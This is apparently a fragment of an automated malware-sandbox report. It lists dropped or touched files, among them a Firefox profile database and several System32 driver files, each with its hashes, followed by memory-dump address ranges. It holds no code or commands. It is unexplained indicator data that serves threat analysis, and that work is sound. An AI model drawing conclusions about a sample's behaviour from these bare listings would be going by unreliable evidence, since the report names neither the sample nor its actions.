                                                                                                            Filesize

                                                                                                            1KB

                                                                                                            MD5

                                                                                                            442106a96a4f60e6db7adbf0e01cdaa3

                                                                                                            SHA1

                                                                                                            fdcc30bc45306c9191441ba33ca780e7ab0f872e

                                                                                                            SHA256

                                                                                                            2825e54765d04c16e6f5093428f1e39f8c43d363dd665ef48035bdb3ea5824b2

                                                                                                            SHA512

                                                                                                            6dc5c3f0004e2961cf75fe63cba7c097a119469f3cd945df965a4af68382654c5013cc62b9812e8c55d10b737d4c1bad8cf966f35dd275244997ca65568621a5

                                                                                                          • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\33b8gs3a.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

                                                                                                            Filesize

                                                                                                            10.3MB

                                                                                                            MD5

                                                                                                            a6cd1f6575a8ac7ff1e129efd86e4212

                                                                                                            SHA1

                                                                                                            9130d1ef25a1580be0e686ab1f3ee4c32b7084a1

                                                                                                            SHA256

                                                                                                            5ce011b67b85e320333c641c538d61618a4c7dabbeb0d283e2325b60ff5eb0d8

                                                                                                            SHA512

                                                                                                            5cf1f2987649e7e2659b313702605ef6d42768acf2a38758913faad0875b2185ecd442f73e35d76726a413f89d5f99108275ce3006727cae310553e6e93fad3a

                                                                                                          • C:\Windows\System32\drivers\9c4d2b28.sys

                                                                                                            Filesize

                                                                                                            368KB

                                                                                                            MD5

                                                                                                            990442d764ff1262c0b7be1e3088b6d3

                                                                                                            SHA1

                                                                                                            0b161374074ef2acc101ed23204da00a0acaa86e

                                                                                                            SHA256

                                                                                                            6c7ccd465090354438b39da8430a5c47e7f24768a5b12ee02fecf8763e77c9e4

                                                                                                            SHA512

                                                                                                            af3c6dfe32266a9d546f13559dcba7c075d074bdfdaf0e6bf2a8cae787008afa579f0d5f90e0c657dd614bb244a6d95ff8366c14b388e1f4a3ab76cccb23add4

                                                                                                          • C:\Windows\System32\drivers\klupd_9c4d2b28a_klark.sys

                                                                                                            Filesize

                                                                                                            355KB

                                                                                                            MD5

                                                                                                            9cfe1ced0752035a26677843c0cbb4e3

                                                                                                            SHA1

                                                                                                            e8833ac499b41beb6763a684ba60333cdf955918

                                                                                                            SHA256

                                                                                                            3bdb393dfaa63b9650658d9288a1dc9a62acc0d44c2f5eab9170485356b9b634

                                                                                                            SHA512

                                                                                                            29e912e7e19f5ca984fb36fc38df87ed9f8eaa1b62fd0c21d75cbc7b7f16a441de3a97c40a813a8989953ff7c4045d6173066be2a6e6140c90325546b3d0773c

                                                                                                          • C:\Windows\System32\drivers\klupd_9c4d2b28a_klbg.sys

                                                                                                            Filesize

                                                                                                            199KB

                                                                                                            MD5

                                                                                                            424b93cb92e15e3f41e3dd01a6a8e9cc

                                                                                                            SHA1

                                                                                                            2897ab04f69a92218bfac78f085456f98a18bdd3

                                                                                                            SHA256

                                                                                                            ccb99a2eeb80cd74cc58691e7af7fce3264b941aea3d777d9e4a950b9e70b82e

                                                                                                            SHA512

                                                                                                            15e984a761d873eef0ab50f8292fbba771208ff97a57b131441666c6628936c29f8b1f0e04ef8e880f33ef6fccebd20db882997ca3504c9e5ea1db781b9ffb0f

                                                                                                          • C:\Windows\System32\drivers\klupd_9c4d2b28a_mark.sys

                                                                                                            Filesize

                                                                                                            260KB

                                                                                                            MD5

                                                                                                            66522d67917b7994ddfb5647f1c3472e

                                                                                                            SHA1

                                                                                                            f341b9b28ca7ac21740d4a7d20e4477dba451139

                                                                                                            SHA256

                                                                                                            5da15bcd1ad66b56b73994a073e8f0ff4170b9ed09c575ca1b046a59a01cc8a1

                                                                                                            SHA512

                                                                                                            921babab093c5bd1e0ec1615c8842081b402a491ecc744613929fa5fafde628cd9bcc1b38b70024a8fa4317aea0b0dce71cd19f44103e50d6ed7a8d9e2a55968

                                                                                                          • memory/412-155-0x0000000000810000-0x0000000000998000-memory.dmp

                                                                                                            Filesize

                                                                                                            1.5MB

                                                                                                          • memory/412-146-0x0000000140000000-0x000000014043F000-memory.dmp

                                                                                                            Filesize

                                                                                                            4.2MB

                                                                                                          • memory/412-154-0x0000000000810000-0x0000000000998000-memory.dmp

                                                                                                            Filesize

                                                                                                            1.5MB

                                                                                                          • memory/412-156-0x0000000000810000-0x0000000000998000-memory.dmp

                                                                                                            Filesize

                                                                                                            1.5MB

                                                                                                          • memory/412-159-0x0000000000810000-0x0000000000998000-memory.dmp

                                                                                                            Filesize

                                                                                                            1.5MB

                                                                                                          • memory/412-158-0x0000000000810000-0x0000000000998000-memory.dmp

                                                                                                            Filesize

                                                                                                            1.5MB

                                                                                                          • memory/412-150-0x0000000000810000-0x0000000000998000-memory.dmp

                                                                                                            Filesize

                                                                                                            1.5MB

                                                                                                          • memory/412-148-0x0000000000810000-0x0000000000998000-memory.dmp

                                                                                                            Filesize

                                                                                                            1.5MB

                                                                                                          • memory/412-161-0x0000000000810000-0x0000000000998000-memory.dmp

                                                                                                            Filesize

                                                                                                            1.5MB

                                                                                                          • memory/412-149-0x0000000000810000-0x0000000000998000-memory.dmp

                                                                                                            Filesize

                                                                                                            1.5MB

                                                                                                          • memory/412-160-0x0000000000810000-0x0000000000998000-memory.dmp

                                                                                                            Filesize

                                                                                                            1.5MB

                                                                                                          • memory/412-151-0x0000000000810000-0x0000000000998000-memory.dmp

                                                                                                            Filesize

                                                                                                            1.5MB

                                                                                                          • memory/412-153-0x0000000000810000-0x0000000000998000-memory.dmp

                                                                                                            Filesize

                                                                                                            1.5MB

                                                                                                          • memory/412-152-0x0000000000810000-0x0000000000998000-memory.dmp

                                                                                                            Filesize

                                                                                                            1.5MB

                                                                                                          • memory/412-157-0x0000000000810000-0x0000000000998000-memory.dmp

                                                                                                            Filesize

                                                                                                            1.5MB

                                                                                                          • memory/412-162-0x0000000000810000-0x0000000000998000-memory.dmp

                                                                                                            Filesize

                                                                                                            1.5MB

                                                                                                          • memory/724-57-0x0000000000290000-0x000000000074F000-memory.dmp

                                                                                                            Filesize

                                                                                                            4.7MB

                                                                                                          • memory/724-50-0x0000000000290000-0x000000000074F000-memory.dmp

                                                                                                            Filesize

                                                                                                            4.7MB

                                                                                                          • memory/724-37-0x0000000000290000-0x000000000074F000-memory.dmp

                                                                                                            Filesize

                                                                                                            4.7MB

                                                                                                          • memory/724-145-0x0000000000290000-0x000000000074F000-memory.dmp

                                                                                                            Filesize

                                                                                                            4.7MB

                                                                                                          • memory/724-23-0x0000000000290000-0x000000000074F000-memory.dmp

                                                                                                            Filesize

                                                                                                            4.7MB

                                                                                                          • memory/724-21-0x0000000000290000-0x000000000074F000-memory.dmp

                                                                                                            Filesize

                                                                                                            4.7MB

                                                                                                          • memory/724-22-0x0000000000290000-0x000000000074F000-memory.dmp

                                                                                                            Filesize

                                                                                                            4.7MB

                                                                                                          • memory/724-20-0x0000000000290000-0x000000000074F000-memory.dmp

                                                                                                            Filesize

                                                                                                            4.7MB

                                                                                                          • memory/724-19-0x0000000000291000-0x00000000002BF000-memory.dmp

                                                                                                            Filesize

                                                                                                            184KB

                                                                                                          • memory/724-17-0x0000000000290000-0x000000000074F000-memory.dmp

                                                                                                            Filesize

                                                                                                            4.7MB

                                                                                                          • memory/1100-133-0x0000000005810000-0x0000000005876000-memory.dmp

                                                                                                            Filesize

                                                                                                            408KB

                                                                                                          • memory/1100-34998-0x0000000005EA0000-0x0000000005EBE000-memory.dmp

                                                                                                            Filesize

                                                                                                            120KB

                                                                                                          • memory/1100-134-0x0000000005880000-0x00000000058E6000-memory.dmp

                                                                                                            Filesize

                                                                                                            408KB

                                                                                                          • memory/1100-123-0x00000000050F0000-0x0000000005718000-memory.dmp

                                                                                                            Filesize

                                                                                                            6.2MB

                                                                                                          • memory/1100-122-0x00000000025A0000-0x00000000025D6000-memory.dmp

                                                                                                            Filesize

                                                                                                            216KB

                                                                                                          • memory/1100-135-0x00000000058F0000-0x0000000005C44000-memory.dmp

                                                                                                            Filesize

                                                                                                            3.3MB

                                                                                                          • memory/1100-34999-0x0000000005ED0000-0x0000000005F1C000-memory.dmp

                                                                                                            Filesize

                                                                                                            304KB

                                                                                                          • memory/1100-35015-0x0000000007360000-0x00000000073F6000-memory.dmp

                                                                                                            Filesize

                                                                                                            600KB

                                                                                                          • memory/1100-132-0x0000000005020000-0x0000000005042000-memory.dmp

                                                                                                            Filesize

                                                                                                            136KB

                                                                                                          • memory/1100-35010-0x00000000075E0000-0x0000000007C5A000-memory.dmp

                                                                                                            Filesize

                                                                                                            6.5MB

                                                                                                          • memory/1100-35018-0x0000000008210000-0x00000000087B4000-memory.dmp

                                                                                                            Filesize

                                                                                                            5.6MB

                                                                                                          • memory/1100-35016-0x0000000007300000-0x0000000007322000-memory.dmp

                                                                                                            Filesize

                                                                                                            136KB

                                                                                                          • memory/1100-35011-0x00000000063E0000-0x00000000063FA000-memory.dmp

                                                                                                            Filesize

                                                                                                            104KB

                                                                                                          • memory/1620-77-0x0000000000400000-0x000000000069A000-memory.dmp

                                                                                                            Filesize

                                                                                                            2.6MB

                                                                                                          • memory/1988-1-0x00000000775D4000-0x00000000775D6000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/1988-2-0x0000000000D01000-0x0000000000D2F000-memory.dmp

                                                                                                            Filesize

                                                                                                            184KB

                                                                                                          • memory/1988-3-0x0000000000D00000-0x00000000011BF000-memory.dmp

                                                                                                            Filesize

                                                                                                            4.7MB

                                                                                                          • memory/1988-4-0x0000000000D00000-0x00000000011BF000-memory.dmp

                                                                                                            Filesize

                                                                                                            4.7MB

                                                                                                          • memory/1988-16-0x0000000000D00000-0x00000000011BF000-memory.dmp

                                                                                                            Filesize

                                                                                                            4.7MB

                                                                                                          • memory/1988-0-0x0000000000D00000-0x00000000011BF000-memory.dmp

                                                                                                            Filesize

                                                                                                            4.7MB

                                                                                                          • memory/2896-80-0x00000000005C0000-0x00000000005C2000-memory.dmp

                                                                                                            Filesize

                                                                                                            8KB

                                                                                                          • memory/2896-81-0x00000152C4750000-0x00000152C47C1000-memory.dmp

                                                                                                            Filesize

                                                                                                            452KB

                                                                                                          • memory/2896-88-0x00000152C4750000-0x00000152C47C1000-memory.dmp

                                                                                                            Filesize

                                                                                                            452KB

                                                                                                          • memory/2896-90-0x00000152C4750000-0x00000152C47C1000-memory.dmp

                                                                                                            Filesize

                                                                                                            452KB

                                                                                                          • memory/2896-89-0x00000152C4750000-0x00000152C47C1000-memory.dmp

                                                                                                            Filesize

                                                                                                            452KB

                                                                                                          • memory/3508-100-0x000001FBF07C0000-0x000001FBF07E2000-memory.dmp

                                                                                                            Filesize

                                                                                                            136KB

                                                                                                          • memory/5576-35332-0x0000000000290000-0x000000000074F000-memory.dmp

                                                                                                            Filesize

                                                                                                            4.7MB

                                                                                                          • memory/5576-35361-0x0000000000290000-0x000000000074F000-memory.dmp

                                                                                                            Filesize

                                                                                                            4.7MB

                                                                                                          • memory/6256-37052-0x0000000000BF0000-0x0000000001044000-memory.dmp

                                                                                                            Filesize

                                                                                                            4.3MB

                                                                                                          • memory/6256-36917-0x0000000000BF0000-0x0000000001044000-memory.dmp

                                                                                                            Filesize

                                                                                                            4.3MB

                                                                                                          • memory/6256-36270-0x0000000000BF0000-0x0000000001044000-memory.dmp

                                                                                                            Filesize

                                                                                                            4.3MB

                                                                                                          • memory/6256-36276-0x0000000000BF0000-0x0000000001044000-memory.dmp

                                                                                                            Filesize

                                                                                                            4.3MB

                                                                                                          • memory/6256-36275-0x0000000000BF0000-0x0000000001044000-memory.dmp

                                                                                                            Filesize

                                                                                                            4.3MB

                                                                                                          • memory/7036-35063-0x0000000000940000-0x0000000000DF7000-memory.dmp

                                                                                                            Filesize

                                                                                                            4.7MB

                                                                                                          • memory/7036-35042-0x0000000000940000-0x0000000000DF7000-memory.dmp

                                                                                                            Filesize

                                                                                                            4.7MB

                                                                                                          • memory/8888-35739-0x0000000000400000-0x0000000000CDC000-memory.dmp

                                                                                                            Filesize

                                                                                                            8.9MB

                                                                                                          • memory/8888-35570-0x0000000000400000-0x0000000000CDC000-memory.dmp

                                                                                                            Filesize

                                                                                                            8.9MB

                                                                                                          • memory/9304-35930-0x0000000000BD0000-0x0000000000EE1000-memory.dmp

                                                                                                            Filesize

                                                                                                            3.1MB

                                                                                                          • memory/9304-36149-0x0000000000BD0000-0x0000000000EE1000-memory.dmp

                                                                                                            Filesize

                                                                                                            3.1MB

                                                                                                          • memory/10980-36168-0x0000000000CE0000-0x0000000001365000-memory.dmp

                                                                                                            Filesize

                                                                                                            6.5MB

                                                                                                          • memory/10980-36269-0x0000000000CE0000-0x0000000001365000-memory.dmp

                                                                                                            Filesize

                                                                                                            6.5MB

                                                                                                          • memory/10980-41152-0x0000000000CE0000-0x0000000001365000-memory.dmp

                                                                                                            Filesize

                                                                                                            6.5MB

                                                                                                          • memory/11164-35267-0x0000000000400000-0x0000000000DFE000-memory.dmp

                                                                                                            Filesize

                                                                                                            10.0MB

                                                                                                          • memory/11164-35552-0x0000000000400000-0x0000000000DFE000-memory.dmp

                                                                                                            Filesize

                                                                                                            10.0MB

                                                                                                          • memory/11252-37753-0x0000000000290000-0x000000000074F000-memory.dmp

                                                                                                            Filesize

                                                                                                            4.7MB